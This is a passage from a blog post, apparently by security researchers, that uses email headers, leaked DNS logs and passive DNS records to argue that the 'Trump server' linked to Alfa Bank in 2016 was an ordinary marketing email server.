<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2nxXEyhDXpz-UV40VHfCrcA6RWn4YDqGlThYdxXOzgpYQQxSvSpsdQxoeDvHQHAKTR05Ck7g3cOMy7aqQCp1mNs2oGHacRVHhR_LDuwePd81-VpCCKfNbiL0MrEoASOCMkZhLSTiqTXaw/s1600/Moscow-acylic-canvas-m2017.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a></div>
<h3 style="text-align: left;">
The debunkings will continue...</h3>
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL0W2VE93J4gbVp6Hid5dbmyH-Pp5g9JUEjP2sK_Pv1KeWPj-yTG8CByb9Oi3YWMHUbSafgHYs6lyXX-u9cEHBvph9XtnrYk4HF0Y3gi3ZpH3hpSuguUtjJURwRfKjnff4NThPeZIPqJuQ/s1600/Moscow-acylic-canvas-m2017.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL0W2VE93J4gbVp6Hid5dbmyH-Pp5g9JUEjP2sK_Pv1KeWPj-yTG8CByb9Oi3YWMHUbSafgHYs6lyXX-u9cEHBvph9XtnrYk4HF0Y3gi3ZpH3hpSuguUtjJURwRfKjnff4NThPeZIPqJuQ/s320/Moscow-acylic-canvas-m2017.jpg" style="cursor: move;" title="Copyright Mila Parkour" width="320" /></a></div>
<div>
The news of Trump's server making interesting outbound connections caught attention of many security researchers in October 2016 and many of us, nerds, spent at least some time checking IP addresses, domains and looking at the logs. </div>
<div>
<br /></div>
<div>
However, the logs that were kindly shared by <a href="http://ljean.com/NetworkData.php">Jean Camp</a> brought more questions than answers. For example, we see a bunch of DNS lookups for the A records of <i>MAIL1.TRUMP-EMAIL.COM</i> , but not much more that would support the claims of the secret communications. A number of researchers looked at it and wrote detailed explanations of why it is just a marketing email server, unlikely to be used for clandestine communications, and why the DNS log correlation with the political events seems very circumstantial. The fact that there was not enough information to make a final conclusion allowed that story to simmer until it flared up again in March, 2017 when Trump made allegations about the Trump tower wiretapping. </div>
<div>
<br /></div>
<div>
The reason we are raising this story from the dead again is to provide additional evidence that the "Trump's server" used to be a marketing email server. We also offer our possible explanations to some of the events and question some premises and assumptions of the original disclosure. We may repeat a lot of good points made by <a href="https://krypt3ia.wordpress.com/2016/11/01/shits-gone-plaid-gdd53-and-slate/">Krypt3ia</a> and <a href="http://blog.erratasec.com/2016/11/debunking-trumps-secret-server.html#.WMoe9RIrJTZ">Errata Security</a> in order to turn this collection of events into to a more cohesive narrative.<br />
<b><br /></b>
<br />
<div class="" style="clear: both;">
<b>Disclaimer:</b> We analyzed the email messages, the leaked logs, public DNS and IP information. We seek technical correctness and will welcome additional data. Conclusions that were made in this article were not driven by political opinions, we did not vote for Trump and do not have any interests in Alfa Bank. If you find technical or factual errors, please let us know in comments or <a href="https://www.blogger.com/profile/05026389826489033821">email</a>.</div>
<div class="separator" style="clear: both;">
<br /></div>
<span style="color: #f1c232;">Examples of emails sent from the server in 2011-2016</span></div>
<div>
The samples of email messages below show that the server was used for sending newsletter offers for at least 5 years and likely longer. We have a number of samples and mail logs of spam messages dated March 7, 2011-February 29, 2016. Please see below the email screenshots, list of subjects along with the partial string from each header, headers and screenshots of two messages.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglSc6GLQeWDJ5Oebei2XAE4YvjiGatVSg-qKi9YubWdgbOQyoA62UiFfXpfuNIV3N0eB0_W7Tm6YSGbQ1TDLqZjCyaOe8po0JYlgbD0uFmraYNd5slubeNJu79dimU9Yv6KaVtnf3NRwtv/s1600/screenshot-1749.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglSc6GLQeWDJ5Oebei2XAE4YvjiGatVSg-qKi9YubWdgbOQyoA62UiFfXpfuNIV3N0eB0_W7Tm6YSGbQ1TDLqZjCyaOe8po0JYlgbD0uFmraYNd5slubeNJu79dimU9Yv6KaVtnf3NRwtv/s1600/screenshot-1749.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Examples of marketing emails from March 7, 2011 to Feb 29.2016</td></tr>
</tbody></table>
</div>
<div>
<table border="1" style="background-color: white; border-spacing: 1px; box-sizing: border-box; color: #313131; font-family: verdana, geneva, tahoma, arial, helvetica, sans-serif; font-size: 14px;"><tbody style="box-sizing: border-box;">
<tr style="box-sizing: border-box;"><td style="box-sizing: border-box;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4CFwQSsDWlp5wWbNPIzmH3717gh1vly4bg5JHpsbJ978zFHxaTuC7Ir5EMsTWZFql1BkV_Fkqtt9l3RyQVBVFXRnwgCY2UWS6XQi-NDdiv8-uMr4rjR8JLHpCLNr4u2ybQWR3OxCd0R9P/s1600/screenshot-1757.png" imageanchor="1" style="clear: left; font-family: times; font-size: medium; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4CFwQSsDWlp5wWbNPIzmH3717gh1vly4bg5JHpsbJ978zFHxaTuC7Ir5EMsTWZFql1BkV_Fkqtt9l3RyQVBVFXRnwgCY2UWS6XQi-NDdiv8-uMr4rjR8JLHpCLNr4u2ybQWR3OxCd0R9P/s320/screenshot-1757.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: x-small;">Variety of emails received<br /> from <i style="font-size: 12.8px;">MAIL1.TRUMP-EMAIL.COM</i><span style="font-size: 12.8px;"> </span></span><br />
<span style="font-family: inherit; font-size: x-small;"><span style="font-size: 12.8px;">2011-2016</span></span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
</td><td style="box-sizing: border-box;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibIAiVOVQeYHgARNLCUIAxtWLZxAczYSY2yRi3zS6F4zd_6Voqg06euuQlKAwQ5FBPmjJu7whEiiJvo3IkKDQYf4_GR-TWRJHeNfg9Q7idpX6172FOHhOpNhAcEcYgZsFIdTS2NDmnYV2X/s1600/mar2011email.png" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibIAiVOVQeYHgARNLCUIAxtWLZxAczYSY2yRi3zS6F4zd_6Voqg06euuQlKAwQ5FBPmjJu7whEiiJvo3IkKDQYf4_GR-TWRJHeNfg9Q7idpX6172FOHhOpNhAcEcYgZsFIdTS2NDmnYV2X/s320/mar2011email.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">First message sample<br />
available date: Mar.7, 2011</td></tr>
</tbody></table>
<br /></td></tr>
<tr style="box-sizing: border-box;"><td style="box-sizing: border-box;"><div style="text-align: center;">
<span style="color: black; font-size: small;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5p9ahYe_swUGPBouVCQoFTp8VvIAUpekRvf9LnTrZUCotv5ObiQiAV9n2TGujQx4csCHnvon1BLE_Q1_gznRojJKXH31FnsKiUoaCROPlmnXatQ6L37esbF_BWFdpCh8Sr_3wxuI45UWg/s1600/screenshot-1750.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5p9ahYe_swUGPBouVCQoFTp8VvIAUpekRvf9LnTrZUCotv5ObiQiAV9n2TGujQx4csCHnvon1BLE_Q1_gznRojJKXH31FnsKiUoaCROPlmnXatQ6L37esbF_BWFdpCh8Sr_3wxuI45UWg/s320/screenshot-1750.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Last message available dated:<br />
Feb. 29, 2016</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-size: small;"></span></div>
<span style="color: black; font-size: small;">
</span></div>
</td><td style="box-sizing: border-box;"><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjcIG2uKnpFyKH3ESYRnyKy2TmTo64hrQBHXnxKn6PpyFoksqhwuuAIb7j119gPrlLP_To8LVCKv9IRmQjtEyVmPKEQ3iPqh9x2Xi8arZ15Y-uppjKgI6cqPOzo_xz6i8nzx5oHqMupI2r/s1600/header.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjcIG2uKnpFyKH3ESYRnyKy2TmTo64hrQBHXnxKn6PpyFoksqhwuuAIb7j119gPrlLP_To8LVCKv9IRmQjtEyVmPKEQ3iPqh9x2Xi8arZ15Y-uppjKgI6cqPOzo_xz6i8nzx5oHqMupI2r/s320/header.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Raw email header of last email<br />
avail. Feb. 29, 2016</td></tr>
</tbody></table>
</td></tr>
</tbody></table>
<h3 style="text-align: left;">
<br />Before we go into technical details, here is a list of points in a Q&A form.</h3>
<div class="separator" style="clear: both;">
<span style="color: #f1c232;">Q: </span>Did Trump or his associates communicate with the Russian bank via his server?</div>
<div class="separator" style="clear: both;">
<b><span style="color: #f1c232;">A: </span></b>The messages were sent from one DNS server (Alfa Bank) to another DNS server (Cendyn) asking for the IP address of mail1.trump-email.com. The leaked logs that contain these queries do not give enough data to substantiate such claims.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNZbNCdM3zeCB0pIkFYX8Y5AYOe_CHzGkishRW9XggzkNI5b0oRRi889wuPtkScNsxekGFcNtraJK7fPFO3wp7U2FJMiqPtGEuZpt1J_EZ4QwQue-lc8peiNd3cxRMTNUbtp64LwJ5wH4s/s1600/irce-2014-booth.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNZbNCdM3zeCB0pIkFYX8Y5AYOe_CHzGkishRW9XggzkNI5b0oRRi889wuPtkScNsxekGFcNtraJK7fPFO3wp7U2FJMiqPtGEuZpt1J_EZ4QwQue-lc8peiNd3cxRMTNUbtp64LwJ5wH4s/s200/irce-2014-booth.jpg" width="112" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Listrak Conf. Booth</td></tr>
</tbody></table>
<b><span style="color: #f1c232;">Q:</span></b><b><span style="color: #f1c232;"> </span></b>Does that prove <insert anything related to Trump's claims about wiretapping, Russian computer hacking, Russian ties, etc? <br />
<span style="color: #f1c232;"><span style="color: #f1c232;"><b>A: </b></span></span>Despite various wild theories, the events described in the original post and the logs have no relation to the Trump's claims that his wires were <strike>crossed</strike> tapped. This post does not prove that he "has" or "has no" other connections to Russia or anything about Russian hacking or other foreign entities. "The server " has never been the primary reason for the listed allegations.<br />
<span style="color: #f1c232;"><br /><span style="color: #f1c232;"><b>Q:</b></span></span><b><span style="color: #f1c232;"> </span></b>Can that server in Trump tower be possibly bugged by Obama, the British or hacked by<br />
someone who wants to accuse the president in communications with Russia.<br />
<span style="color: #f1c232;"><b>A:</b></span><b><span style="color: #f1c232;"> </span></b>"That server" is the same server we are talking about and it is not in the Trump tower. The server mail1.trump-email.com 66.216.133.29 was located in the Lititz, PA datacenter of a reputable digital marketing company Listrak contracted by Cendyn. Currently, the server with the IP address 66.216.133.29 is still in the datacenter and will be recycled for other needs. MAIL1.TRUMP-EMAIL.COM is pointing to a GoDaddy domain parking IP address (no actual server). TRUMP1.CONTACT-CLIENT.COM is still pointing to 66.216.133.29.<br />
<span style="color: #f1c232;"><br /><span style="color: #f1c232;"><b>Q:</b></span></span><b><span style="color: #f1c232;"> </span></b>So, what happened then?<br />
<span style="color: #f1c232;"><b>A:</b></span><b><span style="color: #f1c232;"> </span></b><br />
<div class="" style="clear: both;">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7hoeoJBX4hio19aDIm4-fHm9fK0zYTtdjPlaz_bkvltc95D1TSJwjflJt_bmypKBuJaVu3g1NuXJm3z-J7V_K4cMe_dv_HmmqdUTDsEe5DJ7MlhCM0EYyMH-2xpNj-ZEcTv7uIFQqIuJL/s1600/beforeMarch2016.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7hoeoJBX4hio19aDIm4-fHm9fK0zYTtdjPlaz_bkvltc95D1TSJwjflJt_bmypKBuJaVu3g1NuXJm3z-J7V_K4cMe_dv_HmmqdUTDsEe5DJ7MlhCM0EYyMH-2xpNj-ZEcTv7uIFQqIuJL/s320/beforeMarch2016.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Mail flow before March 2016</td></tr>
</tbody></table>
From at least 2011 to March, 2016, Alfa Bank employees and many other recipients around the world received so called marketing emails (aka spam) from Trump Organization sent from MAIL1.TRUMP-EMAIL.COM. Digital marketing companies Cendyn and Listrak who provided the mailing services used their mail and DNS servers in Pennsylvania and Florida. Cendyn registered that domain for the Trump Organization, which already owns over 3500 domains (src. <a href="https://reversewhois.domaintools.com/?email=34f379a1752ba1ab647bb9d62de7c4f1">Domaintools</a>). None of the servers were ever physically in the Trump's Tower. <br />
<br />
In March 2016, Trump Organization changed the vendor and stopped using Cendyn's services. Since at least May 4, 2016 (earliest date in the logs), at least some of the companies that we believe received Trump spam in the past continued to make DNS lookup requests for IP address of MAIL1.TRUMP-EMAIL.COM. Alfa Bank and Spectrum Health made many more lookups than others. Other IP addresses belong to a quarantine appliance run by an Anti-Spam cloud filtering provider <a href="https://www.mailcleaner.net/">MailCleaner</a>, eCommerce Corporation mail service, Australian company called Shiftcare (software for home care services), Hostedmail.com, DNS server for small business hosting.<br />
They did not directly connect to MAIL1.TRUMP-EMAIL.COM. In addition, it is believed <a href="https://twitter.com/russellbrandom/status/793289191555825664">many other companies</a> were seen by various ISP providers doing similar lookups.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwLJpBnQLT8sv04dqP8sfDmzmqNGvOdo1FUrkLuL9yPdrr922R-rpdBH85Er6oHaFP4spN4kWEvP9itoHq1XZSFttpZlgrW1dKH3a3xWF-FPc0VgkyA6rR81iVSl9jAtD6K9t9PWny1F54/s1600/screenshot-1795.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwLJpBnQLT8sv04dqP8sfDmzmqNGvOdo1FUrkLuL9yPdrr922R-rpdBH85Er6oHaFP4spN4kWEvP9itoHq1XZSFttpZlgrW1dKH3a3xWF-FPc0VgkyA6rR81iVSl9jAtD6K9t9PWny1F54/s320/screenshot-1795.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px; text-align: center;">DNS Lookups as seen in the logs until September 23, 2016<br />
The circle "Logs that leaked" shows the conversation content<br />
in the logs. This does not imply that the logs were stolen from<br />
Cendyn's ns[1-3].cdcservices.com as this is not the only<br />
source where they could come from. <br />
<a href="https://twitter.com/mikedamm/status/793501947743436800">There are concerns about the source of the logs</a></td></tr>
</tbody></table>
The logs span the period from May 4, 2016 to Sept. 23 2016 and contain DNS lookup requests made by Alfa Bank's DNS servers and the companies mentioned. Some IP addresses in the logs are not actual DNS servers but gateway IP addresses for those networks. <br />
<br />
Alfa Bank and other companies made daily (1-70+ a day) queries / DNS lookups asking for the IP address of MAIL1.TRUMP-EMAIL.COM that sent those spam emails, as seen in the email headers below.<br />
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo}
</style>
<br />
<blockquote class="tr_bq">
<span style="font-family: "courier new" , "courier" , monospace;">Received: from <b>mail1.trump-email.com</b> ([66.216.133.29])</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> by <redacted> with ESMTP; 14 Jun 2013 11:19:11 -0400</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=key1; d=contact-client.com;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> h=List-Unsubscribe:MIME-Version:From:To:Reply-To:Date:Subject:Content-Type:Content-Transfer-Encoding:Message-ID; i=trumphotels@contact-client.com;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">...</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Received: by <b>mail1.trump-email.com</b> id hncq6u17vn06 for <redacted@redacted.com>; Fri, 14 Jun 2013 11:19:11 -0400 (envelope-from <839CBA2F17SGIAGALHHU5NQ418SP0I4GT7UPH1TKPRC0H2NP5PDVI2JEG27M8MJ@b.contact-client.com>)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">List-Unsubscribe: <mailto:IM2GHO7PREI9U5V5SNNF83BLRHTO1UL966FONR690AG1N73O80JKU740V7EQIQ4G@<b>b.contact-client.com</b>></span></blockquote>
<br />
These DNS lookups for domains and IPs inside messages that are not incoming but already delivered may be caused by any of the following: misconfigurations or glitches on email and mail filtering services, security appliances performing automated or search triggered lookups (DNS lookups on existing blacklists etc.), anti-spam mailbox store rescans, and endpoint level anti-spam products.<br />
For example, anti-spam systems are known to try to resolve and lookup every IP address and DNS name in the email message header, which can sometimes trigger unintended unsubscribe actions. For example, IETF Request for Comments RFC8058 <a href="https://tools.ietf.org/html/rfc8058"> "Signaling One-Click Functionality for List Email Headers"</a> released in Jan. 2017 specifies rules for the broadcast marketing companies to help cope with unintended unsubscribe actions caused by anti-spam systems.<br />
<br />
The exact reason for lookups can be only guessed, since only the companies themselves would be able to tell which of their systems caused it, assuming enough associated internal logs were saved to correlate. The reasons could be different for all companies - some of them made lookups for LINKS.TRUMP-EMAIL.COM as all URLs in the emails used that subdomain. You can see example of those links in the header examples and in these <a href="https://twitter.com/search?f=tweets&q=links.trump-email.com&src=typd">Tweetbot posts</a>.<br />
<br />
On September 21, Alfa bank was reached for comments about the logs, which caused the number of lookups and their variety skyrocket as their security team started the investigation.<br />
<div class="" style="clear: both;">
The author of the original disclosure states that the lookup errors started on September 22, 2016 because Cendyn removed the DNS zone for mail1.trump-email.com from ns1 and ns3.cdcservices.com. These were two Cendyn DNS servers in Ft.Lauderdale, FL. The second, ns2.cdcservices.com, is located in Boca Raton, Fl. Considering that Trump was not their client since March 2016, the hasty and belated removal was either co-incidence or reaction to being notified and realizing that the zone, or domain should have been removed long ago.</div>
<div class="" style="clear: both;">
Passive DNS logs show only when the subdomain is first seen, not when created or assigned. The fact that TRUMP1.CONTACT-CLIENT.COM showed up in the passive DNS logs on Sept. 30 could be attributed to testing if the server is reachable using the new (or existing) freebie domain (Cendyn creates them for each customer), especially if they indeed still used it for CRM software that "CenDyn provides to the Trump Organization". </div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
On September 27, Alfa Bank made a DNS request for the new TRUMP1.CONTACT-CLIENT.COM. Considering, that at that time the computer security department was performing investigation of the claims, it is not surprising. The domain was likely coaxed by various lookups and queries performed by their IT department. For example, you can see sudden appearance of queries for <span style="white-space: pre-wrap;"> MAIL.TRUMP-EMAIL.COM (Mail without 1) from Alfa Bank </span><span style="white-space: pre-wrap;">217.12.96.15 on September 22, which can be attributed to the investigation too.</span></div>
<div class="separator" style="clear: both;">
<span style="white-space: pre-wrap;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="color: #f1c232;">Q: </span>Did you see <a href="https://alfabank.ru/press/news/2017/3/17/38162.html">Alfa Bank's statement </a>on March 17, 2017 that they were hacked and thus those connections to the Trump's server were made by hackers to look like Alfa Bank did it. (src. <a href="http://circa.com/politics/alfa-bank-in-russia-said-donald-trump-computer-connections-may-have-been-hacker-hoax">Circa</a>)</div>
<div class="separator" style="clear: both;">
<b><span style="color: #f1c232;">A: </span></b>It is possible to send a lot of DNS traffic, or other requests and perform an attack (DDoS or other) without actually "hacking" the victim. They were not "hacked" in this particular case, in the sense of someone infiltrating their network, nor do they say that. Alfa Bank received a lot of DNS queries and DNS replies to spoofed requests after the news came out. We are sure that many of those requests are the result of various researchers trying things. 1340 DNS queries is not a large number. And no, we didn't do it. </div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
While it is possible to spoof DNS requests and make them look like they came from Alfa Bank, it is not a convincing theory for events before September 23, 2016. From the logs provided, there were 7 other companies seen over the course of 4.5 months doing the same type of lookups.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
We think the DNS spoofing attacks that happened in 2017 as reported by Alfa Bank were spurred by all the news about the mysterious DNS communications channel used by Trump and Russians. Many researchers and hackers would try all kinds of queries to elicit server responses and some possibly tried to make it look like the 'secret' communications continue. The evidence of those research efforts can be seen on the <a href="https://www.farsightsecurity.com/">Farsight pDNS</a> search for TRUMP-EMAIL.COM, where some recent entries include 'new' subdomains like you see below. The cause for these is the fact that TRUMP-EMAIL.COM uses a wildcard DNS record, so queries for its random subdomains will resolve successfully and show up in the database (if seen by any pDNS sensors).</div>
<br />
<table cellspacing="5" class="result" style="background-color: white; border-color: rgb(0, 136, 204); border-radius: 4px; border-style: solid; border-width: 2px; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; margin: 1em 2.5em; padding-left: 1em; padding-right: 1em;"><tbody>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 21:18:09 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><span style="color: #20124d;">thej35t3rpwns.trump-email.com.</span></tt></td><td><tt><span style="color: #20124d;">A</span></tt></td><td><tt><span style="color: #20124d;">184.168.221.46</span></tt></td></tr>
</tbody></table>
<div class="separator" style="clear: both;">
We should note that Cendyn transferred the TRUMP-EMAIL.COM domain to Trump Organization on March 8, 2017, thus all attempts to resolve the domain since that date would return the IP address of GoDaddy domain parking server.</div>
<div class="separator" style="clear: both;">
<br /></div>
<h2 style="text-align: left;">
<span style="color: #ffd966;">Claims and Counterclaims: </span></h2>
<h3 style="text-align: left;">
</h3>
<h3 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><i>Before May 2016:</i></span></span></h3>
<div>
<span style="color: #ffd966;"><span style="color: #9fc5e8;"><span style="color: #a2c4c9;"><span style="font-weight: bold;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Claim 1</b></span>:</span></span><span style="color: #ffd966;"> </span></span></span><br />
<i style="font-family: georgia, "times new roman", serif;">Trump campaign press secretary Hope Hicks: “First of all, it’s not a secret server. The email server, set up for marketing purposes and operated by a third-party, has not been used since 2010. The current traffic on the server from Alphabank’s [sic] IP address is regular DNS server traffic – not email traffic.” (Src. <a href="https://www.theguardian.com/us-news/2016/oct/31/trump-organization-server-russia-bank-slate-report">Guardian</a>)</i></div>
<div>
<blockquote class="tr_bq">
<blockquote class="tr_bq">
<span style="color: cyan;"><span style="color: cyan; font-family: inherit; font-weight: bold;"> </span><span style="color: #e69138;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Response 1:</b></span></span></span></blockquote>
<ul style="text-align: left;">
<li style="text-align: left;"><span style="font-family: inherit;">As you see in the <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6xFZR0UxoxeRZOIA5yFOZwPwgXEODCpJ1nXZ2XS45ynR0Al5QJbumol5-hhoZi5zED5NCaQOHe0968Gsm4-I9XzcArT5lPAGb9-RPVA-1cFv-eWl2RRZeniMrjv1NAj2lv-EWq-7lrPig/s1600/header.png">last message header </a>As you see in the last message header here, the last message was received from that server MAIL1.TRUMP-EMAIL.COM on the IP address 66.216.133.29, the last message was received from that server MAIL1.TRUMP-EMAIL.COM on 66.216.133.29 on February 29, 2016.(src. DeepEnd Research)</span></li>
</ul>
<ul style="text-align: left;">
<li style="text-align: left;"><span style="font-family: inherit;">This tweetbot was still posting links from Trump Hotel's marketing emails in February with the last one on Feb. 29, 2016 (src. <a href="https://twitter.com/search?f=tweets&q=links.trump-email.com&src=typd">Twitter</a>)</span></li>
</ul>
<ul style="text-align: left;">
<li style="text-align: left;"><span style="font-family: inherit;"> Cendyn acknowledged that the last marketing email it delivered for Trump's corporation was sent in March 2016" (Src. <a href="http://www.cnn.com/2017/03/09/politics/fbi-investigation-continues-into-odd-computer-link-between-russian-bank-and-trump-organization/index.html">CNN</a>)</span></li>
</ul>
</blockquote>
</div>
<div>
<div class="separator" style="clear: both;">
</div>
<div style="text-align: left;">
<br class="Apple-interchange-newline" />
<hr />
<h3 style="text-align: left;">
<b><span style="color: #9fc5e8; font-family: inherit;"><i>May 2016 - September 23, 2016. Logs and log time period:</i></span></b></h3>
<span style="color: #ffd966;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><span style="color: #9fc5e8;"><b><span style="color: #9fc5e8;">Claim 2:</span></b></span></span></span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><i>Trump and Russia’s largest private bank communicated via a hidden server </i></span><span style="font-family: "georgia" , "times new roman" , serif;"><i>since at least 2016 May. </i></span><i><span style="font-family: "georgia" , "times new roman" , serif;">(src. <a href="https://gdd53.wordpress.com/">GDD</a>)</span></i></div>
</div>
<div>
<blockquote class="tr_bq" style="text-align: left;">
<blockquote class="tr_bq">
<span style="color: white;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Response 2:</b></span><span style="font-weight: bold;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"> </span><span style="color: white; font-family: inherit;">Not hidden and did not communicate intentionally</span></span></span></blockquote>
</blockquote>
<blockquote class="tr_bq" style="text-align: left;">
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li style="text-align: left;"><span style="font-family: inherit;">As it was already pointed out by many, the sever is located in a server farm that belongs to a hosting company and is one of many used by Cendyn (the company used by Trump Organization for mailing services). It is not more hidden than any server of any cloud services provider.</span></li>
</ul>
<ul style="text-align: left;">
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheQB7oQn2DCmwOk82CGCBHDCWH97XXVS_d0PFNPglGM6MEGhRErSXEpBnzRMzAHA-iYCKT5IgX9zENBzSrGh0O-h55vnzm731kEkbY5Bn2cMH30-UoGfXn_WNbik708WlRuEgMk6HlfeiF/s1600/screenshot-1763.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheQB7oQn2DCmwOk82CGCBHDCWH97XXVS_d0PFNPglGM6MEGhRErSXEpBnzRMzAHA-iYCKT5IgX9zENBzSrGh0O-h55vnzm731kEkbY5Bn2cMH30-UoGfXn_WNbik708WlRuEgMk6HlfeiF/s200/screenshot-1763.png" width="115" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px; text-align: center;">Subdomains of<br />
CONTACT-CLIENT.COM</td></tr>
</tbody></table>
<li style="text-align: left;"><span style="font-family: inherit;">You can see other servers with similar domain names registered by Cendyn in this 66.216.133.0/24 range (src. <a href="http://bgp.he.net/net/66.216.133.0/24#_dns">Hurricane Electric</a>) and check out the domain siblings (<a href="http://help.logicnow.com/mail/documentation/Content/ACM/Topics/MgntConfig-SettingPrefs/What%20is%20a%20sibling%20domain.htm">Sibling domains</a> are subdomains that share a common suffix which is not a <a href="https://publicsuffix.org/list/public_suffix_list.dat">public suffix</a>. ) (src. <a href="https://www.virustotal.com/en/domain/trump1.contact-client.com/information/">Virustotal pDNS</a>). </span></li>
</ul>
</blockquote>
<blockquote class="tr_bq" style="text-align: left;">
<ul style="text-align: left;">
